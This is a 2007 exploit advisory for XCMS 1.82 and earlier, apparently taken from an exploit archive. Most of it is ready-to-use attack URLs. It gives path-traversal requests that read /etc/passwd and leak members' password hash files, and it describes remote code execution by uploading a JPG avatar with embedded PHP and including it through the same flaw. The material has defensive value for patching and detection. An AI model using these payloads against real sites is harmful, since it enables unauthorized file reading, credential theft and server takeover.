XCMS <= 1.82 Remote Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XCMS <= 1.82 Remote Local File Inclusion Vulnerability
# Published : 2007-12-28
# Author : nexen
# Previous Title : xml2owl 0.1.1 showCode.php Remote Command Execution Vulnerability
# Next Title : Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability

#  _ __   _____  _____ _ __
# | '_  / _  / / _  '_ 
# | | | |  __/>  <  __/ | | |
# |_| |_|___/_/____|_| |_|
# XCMS <= 1.82 LFI & RCE Xpl
# Nexen rocked this one ;)
# LFIs
http://127.0.0.1/xcms/index.php?pg=admin&s=../../../../../etc/passwd
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../../../../etc/passwd

# Hash disclosure
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../dati/membri/[username].dtb

# RCE:
Doing RCE is more difficult, you must have an image with a php code binded (you can use edjpgcom to do that)
now upload that image on your panel, and exploit rce trough lfi:

http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../uploads/avatar/[your_username].jpg

# www.Syue.com [2007-12-28]